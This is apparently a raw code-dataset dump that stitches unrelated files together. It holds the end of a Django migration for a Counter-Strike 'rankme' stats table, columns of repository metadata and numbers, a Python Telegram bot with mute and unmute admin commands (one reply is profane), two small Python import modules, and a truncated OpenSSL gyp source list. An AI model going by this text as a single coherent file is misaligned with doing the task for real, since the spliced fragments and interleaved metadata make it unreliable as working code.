('g3sg1', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('m249', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('negev', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('hegrenade', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('flashbang', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('smokegrenade', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('inferno', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('decoy', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('taser', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('mp5sd', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('breachcharge', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('head', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('chest', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('stomach', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('left_arm', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('right_arm', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('left_leg', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('right_leg', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('c4_planted', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('c4_exploded', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('c4_defused', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('ct_win', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('tr_win', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('hostages_rescued', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('vip_killed', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('vip_escaped', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('vip_played', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('mvp', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('damage', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('match_win', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('match_draw', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('match_lose', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('first_blood', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('no_scope', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('no_scope_dis', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
],
options={
'db_table': 'rankme',
'abstract': False,
'managed': False,
},
),
]
| 64.539961
| 119
| 0.577456
| 3,424
| 33,109
| 5.44597
| 0.093458
| 0.11101
| 0.194884
| 0.228777
| 0.853113
| 0.806457
| 0.704832
| 0.683166
| 0.683166
| 0.653724
| 0
| 0.031216
| 0.269504
| 33,109
| 512
| 120
| 64.666016
| 0.739767
| 0.001359
| 0
| 0.605941
| 1
| 0
| 0.091313
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.00198
| 0
| 0.009901
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5227bc7e5082f8e01ba0598829f78d2c9bde3540
| 74
|
py
|
Python
|
src/synapse_downloader/download/__init__.py
|
pcstout/synapse-downloader
|
3c9a6511aa9909929358213bbc0190afa9916846
|
[
"Apache-2.0"
] | null | null | null |
src/synapse_downloader/download/__init__.py
|
pcstout/synapse-downloader
|
3c9a6511aa9909929358213bbc0190afa9916846
|
[
"Apache-2.0"
] | 11
|
2020-03-24T18:00:12.000Z
|
2022-03-01T14:02:16.000Z
|
src/synapse_downloader/download/__init__.py
|
ki-tools/synapse-downloader
|
3c9a6511aa9909929358213bbc0190afa9916846
|
[
"Apache-2.0"
] | 1
|
2019-10-03T22:30:45.000Z
|
2019-10-03T22:30:45.000Z
|
from .downloader import Downloader
from .downloader import FileHandleView
| 24.666667
| 38
| 0.864865
| 8
| 74
| 8
| 0.5
| 0.4375
| 0.625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108108
| 74
| 2
| 39
| 37
| 0.969697
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
525fdda940dd2f25829da4df31b27fa7e3e98931
| 5,123
|
py
|
Python
|
mute.py
|
CrEaTiiOn187/tg-management-bot
|
554dbdd2134c14466baff3f3d448ac66f54ced03
|
[
"MIT"
] | 3
|
2021-10-21T18:16:37.000Z
|
2022-03-10T18:24:55.000Z
|
mute.py
|
NoodleSoup/tg-management-bot
|
554dbdd2134c14466baff3f3d448ac66f54ced03
|
[
"MIT"
] | null | null | null |
mute.py
|
NoodleSoup/tg-management-bot
|
554dbdd2134c14466baff3f3d448ac66f54ced03
|
[
"MIT"
] | 1
|
2020-07-15T07:43:55.000Z
|
2020-07-15T07:43:55.000Z
|
def mute(bot, update):
from chats_data import chats_data
import time
msg = update.message
chat_id = msg.chat_id
if not chats_data.get(chat_id, None) or not chats_data[chat_id].get('mute', None):
bot.send_message(chat_id = msg.chat_id,
text = "The /mute plugin is disabled. You can enable it using `/enable mute` or by /plugins.",
reply_to_message_id = msg.message_id,
parse_mode = 'Markdown')
return
user = bot.get_chat_member(chat_id = chat_id, user_id = msg.from_user.id)['status']
try:
muted = bot.get_chat_member(chat_id = chat_id, user_id = msg.reply_to_message.from_user.id)['status']
except:
bot.send_message(chat_id = msg.chat_id,
text = "Please reply to the person you want to mute.",
reply_to_message_id = msg.message_id,
parse_mode = 'Markdown')
return
if user in ["administrator", "creator"]:
if muted == 'member':
text = msg.text.split(" ",1)
if len(text)>1:
times = text[1]
print(times)
try:
times = int(times)
except:
bot.send_message(chat_id = msg.chat_id,
text = "*Format:*\n_/mute time (in seconds)_",
reply_to_message_id = msg.message_id,
parse_mode = 'Markdown')
return
occurance = bot.restrict_chat_member(chat_id = chat_id, user_id = msg.reply_to_message.from_user.id, until_date = int(time.time())+(times), can_send_messages = False)
if occurance:
bot.send_message(chat_id = msg.chat_id,
text = f"Restricted @{msg.reply_to_message.from_user.username} for {times} seconds.",
reply_to_message_id = msg.message_id)
else:
bot.send_message(chat_id = msg.chat_id,
text = "Couldn't restrict. Maybe I'm not admin...",
reply_to_message_id = msg.message_id,
parse_mode = 'Markdown')
else:
occurance = bot.restrict_chat_member(chat_id = chat_id, user_id = msg.reply_to_message.from_user.id, can_send_messages = False)
if occurance:
bot.send_message(chat_id = msg.chat_id,
text = f"Restricted @{msg.reply_to_message.from_user.username}",
reply_to_message_id = msg.message_id)
else:
bot.send_message(chat_id = msg.chat_id,
text = "Couldn't restrict. Maybe I'm not admin...",
reply_to_message_id = msg.message_id,
parse_mode = 'Markdown')
elif muted in ['left', 'kicked']:
bot.send_message(chat_id = msg.chat_id,
text = "The person is not in the chat anymore.",
reply_to_message_id = msg.message_id,
parse_mode = 'Markdown')
elif muted in ['administrator', 'creator']:
bot.send_message(chat_id = msg.chat_id,
text = "I wish I could restrict admins.",
reply_to_message_id = msg.message_id,
parse_mode = 'Markdown')
elif muted == 'restricted':
bot.send_message(chat_id = msg.chat_id,
text = "User is already restricted.",
reply_to_message_id = msg.message_id,
parse_mode = 'Markdown')
else:
bot.send_message(chat_id = msg.chat_id,
text = "Fuck off, you aren't admin.",
reply_to_message_id = msg.message_id,
parse_mode = 'Markdown')
def unmute(bot, update):
from chats_data import chats_data
import time
msg = update.message
chat_id = msg.chat_id
if not chats_data.get(chat_id, None) or not chats_data[chat_id].get('mute', None):
bot.send_message(chat_id = msg.chat_id,
text = "The /mute plugin is disabled. You can enable it using `/enable mute` or by /plugins.",
reply_to_message_id = msg.message_id,
parse_mode = 'Markdown')
return
user = bot.get_chat_member(chat_id = chat_id, user_id = msg.from_user.id)['status']
try:
muted = bot.get_chat_member(chat_id = chat_id, user_id = msg.reply_to_message.from_user.id)['status']
except:
bot.send_message(chat_id = msg.chat_id,
text = "Please reply to the person you want to mute.",
reply_to_message_id = msg.message_id,
parse_mode = 'Markdown')
return
if user in ["administrator", "creator"]:
if muted == 'restricted':
occurance = bot.restrict_chat_member(chat_id = chat_id, user_id = msg.reply_to_message.from_user.id, can_send_messages = True, can_send_media_messages = True, can_send_other_messages = True, can_add_web_page_previews = True)
if occurance:
bot.send_message(chat_id = msg.chat_id,
text = f"Unrestricted @{msg.reply_to_message.from_user.username}",
reply_to_message_id = msg.message_id)
else:
bot.send_message(chat_id = msg.chat_id,
text = "Couldn't unrestrict. Maybe I'm not admin...",
reply_to_message_id = msg.message_id,
parse_mode = 'Markdown')
else:
bot.send_message(chat_id = msg.chat_id,
text = "The user isn't restricted.",
reply_to_message_id = msg.message_id,
parse_mode = 'Markdown')
else:
bot.send_message(chat_id = msg.chat_id,
text = "Fuck off, you aren't admin.",
reply_to_message_id = msg.message_id,
parse_mode = 'Markdown')
| 40.65873
| 228
| 0.657232
| 759
| 5,123
| 4.134387
| 0.1278
| 0.107075
| 0.111536
| 0.096877
| 0.886233
| 0.886233
| 0.886233
| 0.886233
| 0.881772
| 0.860739
| 0
| 0.000763
| 0.232676
| 5,123
| 125
| 229
| 40.984
| 0.797507
| 0
| 0
| 0.794872
| 0
| 0.017094
| 0.203281
| 0.02521
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017094
| false
| 0
| 0.034188
| 0
| 0.094017
| 0.008547
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5263cd82bf7c456c17f09f6d6f74cdc30049339a
| 141
|
py
|
Python
|
iot_api/user_api/events/__init__.py
|
dolfandringa/rolaguard_backend
|
d4df7b55fc001aa6e0499edcfa94bf1b1c63b084
|
[
"Apache-2.0"
] | null | null | null |
iot_api/user_api/events/__init__.py
|
dolfandringa/rolaguard_backend
|
d4df7b55fc001aa6e0499edcfa94bf1b1c63b084
|
[
"Apache-2.0"
] | 7
|
2020-05-05T20:10:59.000Z
|
2021-05-26T17:59:24.000Z
|
iot_api/user_api/events/__init__.py
|
dolfandringa/rolaguard_backend
|
d4df7b55fc001aa6e0499edcfa94bf1b1c63b084
|
[
"Apache-2.0"
] | 1
|
2021-01-28T05:54:11.000Z
|
2021-01-28T05:54:11.000Z
|
import iot_api.user_api.events.alert_events
import iot_api.user_api.events.data_collector_events
import iot_api.user_api.events.policy_events
| 47
| 52
| 0.900709
| 25
| 141
| 4.68
| 0.36
| 0.230769
| 0.307692
| 0.410256
| 0.74359
| 0.74359
| 0.529915
| 0
| 0
| 0
| 0
| 0
| 0.035461
| 141
| 3
| 53
| 47
| 0.860294
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
5264a9b5124c1c35ef1340404962451657792217
| 48,131
|
gyp
|
Python
|
library/openssl/1.0.1m.gyp
|
KjellSchubert/bru
|
dd70b721d07fbd27c57c845cc3a29cd8f2dfc587
|
[
"MIT"
] | 3
|
2015-01-06T15:22:16.000Z
|
2015-11-27T18:13:04.000Z
|
library/openssl/1.0.1m.gyp
|
KjellSchubert/bru
|
dd70b721d07fbd27c57c845cc3a29cd8f2dfc587
|
[
"MIT"
] | 7
|
2015-02-10T15:13:38.000Z
|
2021-05-30T07:51:13.000Z
|
library/openssl/1.0.1m.gyp
|
KjellSchubert/bru
|
dd70b721d07fbd27c57c845cc3a29cd8f2dfc587
|
[
"MIT"
] | 3
|
2015-01-29T17:19:53.000Z
|
2016-01-06T12:50:06.000Z
|
{
"targets": [
{
# OpenSSL has a lot of config options, with some default options
# enabling known insecure algorithms. What's a good combinations
# of openssl config options?
# ./config no-asm no-shared no-ssl2 no-ssl3 no-hw no-zlib no-threads
# ?
# See also http://codefromthe70s.org/sslimprov.aspx
"target_name": "openssl",
"type": "static_library",
# The list of sources I computed on Windows via:
# >cd bru_modules\openssl\1.0.1m\openssl-1.0.1m
# >perl Configure VC-WIN32 no-asm no-ssl2 no-ssl3 no-hw
# >call ms\\do_ms.bat
# >nmake /n /f ms\nt.mak > nmake.log
# >cd bru_modules\openssl # where the *.gyp is located
# >~\bru\makefile2gyp.py 1.0.1m\openssl-1.0.1m\nmake.log
"sources": [
"1.0.1m/openssl-1.0.1m/crypto/aes/aes_cbc.c",
"1.0.1m/openssl-1.0.1m/crypto/aes/aes_cfb.c",
"1.0.1m/openssl-1.0.1m/crypto/aes/aes_core.c",
"1.0.1m/openssl-1.0.1m/crypto/aes/aes_ctr.c",
"1.0.1m/openssl-1.0.1m/crypto/aes/aes_ecb.c",
"1.0.1m/openssl-1.0.1m/crypto/aes/aes_ige.c",
"1.0.1m/openssl-1.0.1m/crypto/aes/aes_misc.c",
"1.0.1m/openssl-1.0.1m/crypto/aes/aes_ofb.c",
"1.0.1m/openssl-1.0.1m/crypto/aes/aes_wrap.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_bitstr.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_bool.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_bytes.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_d2i_fp.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_digest.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_dup.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_enum.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_gentm.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_i2d_fp.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_int.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_mbstr.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_object.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_octet.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_print.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_set.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_sign.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_strex.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_strnid.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_time.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_type.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_utctm.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_utf8.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/a_verify.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/ameth_lib.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/asn1_err.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/asn1_gen.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/asn1_lib.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/asn1_par.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/asn_mime.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/asn_moid.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/asn_pack.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/bio_asn1.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/bio_ndef.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/d2i_pr.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/d2i_pu.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/evp_asn1.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/f_enum.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/f_int.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/f_string.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/i2d_pr.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/i2d_pu.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/n_pkey.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/nsseq.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/p5_pbe.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/p5_pbev2.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/p8_pkey.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/t_bitst.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/t_crl.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/t_pkey.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/t_req.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/t_spki.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/t_x509.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/t_x509a.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/tasn_dec.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/tasn_enc.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/tasn_fre.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/tasn_new.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/tasn_prn.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/tasn_typ.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/tasn_utl.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/x_algor.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/x_attrib.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/x_bignum.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/x_crl.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/x_exten.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/x_info.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/x_long.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/x_name.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/x_nx509.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/x_pkey.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/x_pubkey.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/x_req.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/x_sig.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/x_spki.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/x_val.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/x_x509.c",
"1.0.1m/openssl-1.0.1m/crypto/asn1/x_x509a.c",
"1.0.1m/openssl-1.0.1m/crypto/bf/bf_cfb64.c",
"1.0.1m/openssl-1.0.1m/crypto/bf/bf_ecb.c",
"1.0.1m/openssl-1.0.1m/crypto/bf/bf_enc.c",
"1.0.1m/openssl-1.0.1m/crypto/bf/bf_ofb64.c",
"1.0.1m/openssl-1.0.1m/crypto/bf/bf_skey.c",
"1.0.1m/openssl-1.0.1m/crypto/bf/bftest.c",
"1.0.1m/openssl-1.0.1m/crypto/bio/b_dump.c",
"1.0.1m/openssl-1.0.1m/crypto/bio/b_print.c",
"1.0.1m/openssl-1.0.1m/crypto/bio/b_sock.c",
"1.0.1m/openssl-1.0.1m/crypto/bio/bf_buff.c",
"1.0.1m/openssl-1.0.1m/crypto/bio/bf_nbio.c",
"1.0.1m/openssl-1.0.1m/crypto/bio/bf_null.c",
"1.0.1m/openssl-1.0.1m/crypto/bio/bio_cb.c",
"1.0.1m/openssl-1.0.1m/crypto/bio/bio_err.c",
"1.0.1m/openssl-1.0.1m/crypto/bio/bio_lib.c",
"1.0.1m/openssl-1.0.1m/crypto/bio/bss_acpt.c",
"1.0.1m/openssl-1.0.1m/crypto/bio/bss_bio.c",
"1.0.1m/openssl-1.0.1m/crypto/bio/bss_conn.c",
"1.0.1m/openssl-1.0.1m/crypto/bio/bss_dgram.c",
"1.0.1m/openssl-1.0.1m/crypto/bio/bss_fd.c",
"1.0.1m/openssl-1.0.1m/crypto/bio/bss_file.c",
"1.0.1m/openssl-1.0.1m/crypto/bio/bss_log.c",
"1.0.1m/openssl-1.0.1m/crypto/bio/bss_mem.c",
"1.0.1m/openssl-1.0.1m/crypto/bio/bss_null.c",
"1.0.1m/openssl-1.0.1m/crypto/bio/bss_sock.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_add.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_asm.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_blind.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_const.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_ctx.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_depr.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_div.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_err.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_exp.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_exp2.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_gcd.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_gf2m.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_kron.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_lib.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_mod.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_mont.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_mpi.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_mul.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_nist.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_prime.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_print.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_rand.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_recp.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_shift.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_sqr.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_sqrt.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_word.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bn_x931p.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/bntest.c",
"1.0.1m/openssl-1.0.1m/crypto/bn/exptest.c",
"1.0.1m/openssl-1.0.1m/crypto/buffer/buf_err.c",
"1.0.1m/openssl-1.0.1m/crypto/buffer/buf_str.c",
"1.0.1m/openssl-1.0.1m/crypto/buffer/buffer.c",
"1.0.1m/openssl-1.0.1m/crypto/camellia/camellia.c",
"1.0.1m/openssl-1.0.1m/crypto/camellia/cmll_cbc.c",
"1.0.1m/openssl-1.0.1m/crypto/camellia/cmll_cfb.c",
"1.0.1m/openssl-1.0.1m/crypto/camellia/cmll_ctr.c",
"1.0.1m/openssl-1.0.1m/crypto/camellia/cmll_ecb.c",
"1.0.1m/openssl-1.0.1m/crypto/camellia/cmll_misc.c",
"1.0.1m/openssl-1.0.1m/crypto/camellia/cmll_ofb.c",
"1.0.1m/openssl-1.0.1m/crypto/camellia/cmll_utl.c",
"1.0.1m/openssl-1.0.1m/crypto/cast/c_cfb64.c",
"1.0.1m/openssl-1.0.1m/crypto/cast/c_ecb.c",
"1.0.1m/openssl-1.0.1m/crypto/cast/c_enc.c",
"1.0.1m/openssl-1.0.1m/crypto/cast/c_ofb64.c",
"1.0.1m/openssl-1.0.1m/crypto/cast/c_skey.c",
"1.0.1m/openssl-1.0.1m/crypto/cast/casttest.c",
"1.0.1m/openssl-1.0.1m/crypto/cmac/cm_ameth.c",
"1.0.1m/openssl-1.0.1m/crypto/cmac/cm_pmeth.c",
"1.0.1m/openssl-1.0.1m/crypto/cmac/cmac.c",
"1.0.1m/openssl-1.0.1m/crypto/cms/cms_asn1.c",
"1.0.1m/openssl-1.0.1m/crypto/cms/cms_att.c",
"1.0.1m/openssl-1.0.1m/crypto/cms/cms_cd.c",
"1.0.1m/openssl-1.0.1m/crypto/cms/cms_dd.c",
"1.0.1m/openssl-1.0.1m/crypto/cms/cms_enc.c",
"1.0.1m/openssl-1.0.1m/crypto/cms/cms_env.c",
"1.0.1m/openssl-1.0.1m/crypto/cms/cms_err.c",
"1.0.1m/openssl-1.0.1m/crypto/cms/cms_ess.c",
"1.0.1m/openssl-1.0.1m/crypto/cms/cms_io.c",
"1.0.1m/openssl-1.0.1m/crypto/cms/cms_lib.c",
"1.0.1m/openssl-1.0.1m/crypto/cms/cms_pwri.c",
"1.0.1m/openssl-1.0.1m/crypto/cms/cms_sd.c",
"1.0.1m/openssl-1.0.1m/crypto/cms/cms_smime.c",
"1.0.1m/openssl-1.0.1m/crypto/comp/c_rle.c",
"1.0.1m/openssl-1.0.1m/crypto/comp/c_zlib.c",
"1.0.1m/openssl-1.0.1m/crypto/comp/comp_err.c",
"1.0.1m/openssl-1.0.1m/crypto/comp/comp_lib.c",
"1.0.1m/openssl-1.0.1m/crypto/conf/conf_api.c",
"1.0.1m/openssl-1.0.1m/crypto/conf/conf_def.c",
"1.0.1m/openssl-1.0.1m/crypto/conf/conf_err.c",
"1.0.1m/openssl-1.0.1m/crypto/conf/conf_lib.c",
"1.0.1m/openssl-1.0.1m/crypto/conf/conf_mall.c",
"1.0.1m/openssl-1.0.1m/crypto/conf/conf_mod.c",
"1.0.1m/openssl-1.0.1m/crypto/conf/conf_sap.c",
"1.0.1m/openssl-1.0.1m/crypto/constant_time_test.c",
"1.0.1m/openssl-1.0.1m/crypto/cpt_err.c",
"1.0.1m/openssl-1.0.1m/crypto/cryptlib.c",
"1.0.1m/openssl-1.0.1m/crypto/cversion.c",
"1.0.1m/openssl-1.0.1m/crypto/des/cbc_cksm.c",
"1.0.1m/openssl-1.0.1m/crypto/des/cbc_enc.c",
"1.0.1m/openssl-1.0.1m/crypto/des/cfb64ede.c",
"1.0.1m/openssl-1.0.1m/crypto/des/cfb64enc.c",
"1.0.1m/openssl-1.0.1m/crypto/des/cfb_enc.c",
"1.0.1m/openssl-1.0.1m/crypto/des/des_enc.c",
"1.0.1m/openssl-1.0.1m/crypto/des/des_old.c",
"1.0.1m/openssl-1.0.1m/crypto/des/des_old2.c",
"1.0.1m/openssl-1.0.1m/crypto/des/destest.c",
"1.0.1m/openssl-1.0.1m/crypto/des/ecb3_enc.c",
"1.0.1m/openssl-1.0.1m/crypto/des/ecb_enc.c",
"1.0.1m/openssl-1.0.1m/crypto/des/ede_cbcm_enc.c",
"1.0.1m/openssl-1.0.1m/crypto/des/enc_read.c",
"1.0.1m/openssl-1.0.1m/crypto/des/enc_writ.c",
"1.0.1m/openssl-1.0.1m/crypto/des/fcrypt.c",
"1.0.1m/openssl-1.0.1m/crypto/des/fcrypt_b.c",
"1.0.1m/openssl-1.0.1m/crypto/des/ofb64ede.c",
"1.0.1m/openssl-1.0.1m/crypto/des/ofb64enc.c",
"1.0.1m/openssl-1.0.1m/crypto/des/ofb_enc.c",
"1.0.1m/openssl-1.0.1m/crypto/des/pcbc_enc.c",
"1.0.1m/openssl-1.0.1m/crypto/des/qud_cksm.c",
"1.0.1m/openssl-1.0.1m/crypto/des/rand_key.c",
"1.0.1m/openssl-1.0.1m/crypto/des/read2pwd.c",
"1.0.1m/openssl-1.0.1m/crypto/des/rpc_enc.c",
"1.0.1m/openssl-1.0.1m/crypto/des/set_key.c",
"1.0.1m/openssl-1.0.1m/crypto/des/str2key.c",
"1.0.1m/openssl-1.0.1m/crypto/des/xcbc_enc.c",
"1.0.1m/openssl-1.0.1m/crypto/dh/dh_ameth.c",
"1.0.1m/openssl-1.0.1m/crypto/dh/dh_asn1.c",
"1.0.1m/openssl-1.0.1m/crypto/dh/dh_check.c",
"1.0.1m/openssl-1.0.1m/crypto/dh/dh_depr.c",
"1.0.1m/openssl-1.0.1m/crypto/dh/dh_err.c",
"1.0.1m/openssl-1.0.1m/crypto/dh/dh_gen.c",
"1.0.1m/openssl-1.0.1m/crypto/dh/dh_key.c",
"1.0.1m/openssl-1.0.1m/crypto/dh/dh_lib.c",
"1.0.1m/openssl-1.0.1m/crypto/dh/dh_pmeth.c",
"1.0.1m/openssl-1.0.1m/crypto/dh/dh_prn.c",
"1.0.1m/openssl-1.0.1m/crypto/dh/dhtest.c",
"1.0.1m/openssl-1.0.1m/crypto/dsa/dsa_ameth.c",
"1.0.1m/openssl-1.0.1m/crypto/dsa/dsa_asn1.c",
